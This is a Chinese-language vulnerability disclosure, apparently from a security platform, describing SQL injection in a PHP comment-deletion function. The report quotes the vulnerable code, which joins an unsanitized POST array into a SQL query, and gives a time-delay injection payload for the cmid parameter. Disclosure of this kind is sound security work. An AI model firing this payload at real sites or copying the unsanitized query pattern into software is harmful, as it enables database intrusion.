### 简要描述:
过滤不严造成注入
### 详细说明:
问题出现在
upload\Home\Lib\Action\commentsaction.class.php
```
public function delmsg() {
$cmid=$_POST['cmid'];
if (is_array($cmid)) {
$cids=implode(',',$cmid);
M('Comments')->where("comment_id IN ($cids) AND (user_id='".$this->my['user_id']."' OR comment_uid='".$this->my['user_id']."')")->delete();
} else if (is_numeric($cmid)) {
M('Comments')->where("comment_id='$cmid' AND (user_id='".$this->my['user_id']."' OR comment_uid='".$this->my['user_id']."')")->delete();
}
echo json_encode(array("ret"=>'success',"tip"=>L('del_comment_success')));
}
```
[<img src="https://images.seebug.org/upload/201402/10133016291cb7283986a54026852452d06dca23.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/10133016291cb7283986a54026852452d06dca23.png)
简单利用代码 如下
cmid[1]=3) and sleep(11111) #
时间延迟注入
### 漏洞证明:
如上所示
京公网安备 11010502034610号
暂无评论